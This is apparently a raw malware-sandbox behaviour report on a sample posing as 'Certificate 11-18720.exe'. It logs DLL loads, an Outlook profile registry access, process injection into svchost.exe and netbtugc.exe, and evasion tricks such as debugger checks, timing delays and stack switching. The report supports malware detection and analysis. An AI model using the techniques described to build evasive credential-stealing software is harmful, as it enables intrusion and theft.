            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Certificate 11-18720.exeStatic file information: File size 1197568 > 1048576
            Source: Certificate 11-18720.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Certificate 11-18720.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Certificate 11-18720.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Certificate 11-18720.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Certificate 11-18720.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Certificate 11-18720.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Certificate 11-18720.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000002.4134504423.000000000010E000.00000002.00000001.01000000.00000004.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000000.1921834218.000000000010E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Certificate 11-18720.exe, 00000000.00000003.1702615943.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-18720.exe, 00000000.00000003.1692848503.0000000003940000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849589393.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849589393.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1753265226.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750496212.0000000003400000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1851937705.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4135936018.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4135936018.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1849505251.00000000029A3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Certificate 11-18720.exe, 00000000.00000003.1702615943.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-18720.exe, 00000000.00000003.1692848503.0000000003940000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1849589393.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849589393.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1753265226.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750496212.0000000003400000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000003.00000003.1851937705.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4135936018.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4135936018.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1849505251.00000000029A3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000002.1849473855.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1818437081.000000000321A000.00000004.00000020.00020000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000002.4135049667.0000000000A58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000003.00000002.4134914771.000000000074E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4136427268.000000000332C000.00000004.10000000.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.00000000025CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2139095510.000000003449C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000003.00000002.4134914771.000000000074E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4136427268.000000000332C000.00000004.10000000.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.00000000025CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2139095510.000000003449C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000002.1849473855.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1818437081.000000000321A000.00000004.00000020.00020000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000002.4135049667.0000000000A58000.00000004.00000020.00020000.00000000.sdmp
            Source: Certificate 11-18720.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Certificate 11-18720.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Certificate 11-18720.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Certificate 11-18720.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Certificate 11-18720.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005DE01E LoadLibraryA,GetProcAddress,0_2_005DE01E
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005EC09E push esi; ret 0_2_005EC0A0
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005EC187 push edi; ret 0_2_005EC189
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0062C8BC push esi; ret 0_2_0062C8BE
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005E6B05 push ecx; ret 0_2_005E6B18
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0062EEB4 push B70F0000h; retf 0_2_0062EEC7
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0060B2B1 push FFFFFF8Bh; iretd 0_2_0060B2B3
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005EBDAA push edi; ret 0_2_005EBDAC
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005EBEC3 push esi; ret 0_2_005EBEC5
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00F47A70 push ebx; ret 0_2_00F47A7F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004048A9 push esp; ret 1_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041E2BA push 00000038h; iretd 1_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A436 push ebx; iretd 1_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418C92 pushad ; retf 1_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A5D9 push ebx; iretd 1_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004017E5 push ebp; retf 003Fh1_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403780 push eax; ret 1_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004147A2 push es; iretd 1_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380225F pushad ; ret 1_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038027FA pushad ; ret 1_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038309AD push ecx; mov dword ptr [esp], ecx1_2_038309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380283D push eax; iretd 1_2_03802858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03801368 push eax; iretd 1_2_03801369
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C6F5A8 push ebx; iretd 2_2_05C6F772
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C7342C push 00000038h; iretd 2_2_05C73430
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C787EA push FFFFFFBAh; ret 2_2_05C787EC
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C6D79E push ebx; ret 2_2_05C6D79F
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C6F74B push ebx; iretd 2_2_05C6F772
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C6DE04 pushad ; retf 2_2_05C6DE05
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C59A1B push esp; ret 2_2_05C59A1C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D0225F pushad ; ret 3_2_02D027F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D027FA pushad ; ret 3_2_02D027F9
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00628111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00628111
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005DEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_005DEB42
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005E123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_005E123A
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeAPI/Special instruction interceptor: Address: F4724C
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E rdtsc 1_2_0387096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 839Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 9133Jump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeEvaded block: after key decisiongraph_0-93711
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeEvaded block: after key decisiongraph_0-92633
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeAPI coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6812Thread sleep count: 839 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6812Thread sleep time: -1678000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6812Thread sleep count: 9133 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6812Thread sleep time: -18266000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe TID: 6496Thread sleep time: -70000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe TID: 6496Thread sleep count: 33 > 30Jump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe TID: 6496Thread sleep time: -33000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00606CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00606CA9
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_006060DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_006060DD
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_006063F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_006063F9
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0060EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0060EB60
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0060F56F FindFirstFileW,FindClose,0_2_0060F56F
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0060F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0060F5FA
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00611B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00611B2F
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00611C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00611C8A
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00611F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00611F94
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0046BAB0 FindFirstFileW,FindNextFileW,FindClose,3_2_0046BAB0
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005DDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005DDDC0
            Source: netbtugc.exe, 00000003.00000002.4134914771.000000000074E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
            Source: firefox.exe, 00000008.00000002.2140440681.000001C7344AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}a
            Source: AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135286737.00000000005B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeAPI call chain: ExitProcess graph end nodegraph_0-92756
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E rdtsc 1_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417823 LdrLoadDll,1_2_00417823
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00616AAF BlockInput,0_2_00616AAF
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005C3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_005C3D19
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005F3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_005F3920
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005DE01E LoadLibraryA,GetProcAddress,0_2_005DE01E
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00F474B8 mov eax, dword ptr fs:[00000030h]0_2_00F474B8
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00F47518 mov eax, dword ptr fs:[00000030h]0_2_00F47518
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00F45E58 mov eax, dword ptr fs:[00000030h]0_2_00F45E58
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385438F mov eax, dword ptr fs:[00000030h]1_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385438F mov eax, dword ptr fs:[00000030h]1_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EC3CD mov eax, dword ptr fs:[00000030h]1_2_038EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B63C0 mov eax, dword ptr fs:[00000030h]1_2_038B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov ecx, dword ptr fs:[00000030h]1_2_038DE3DB
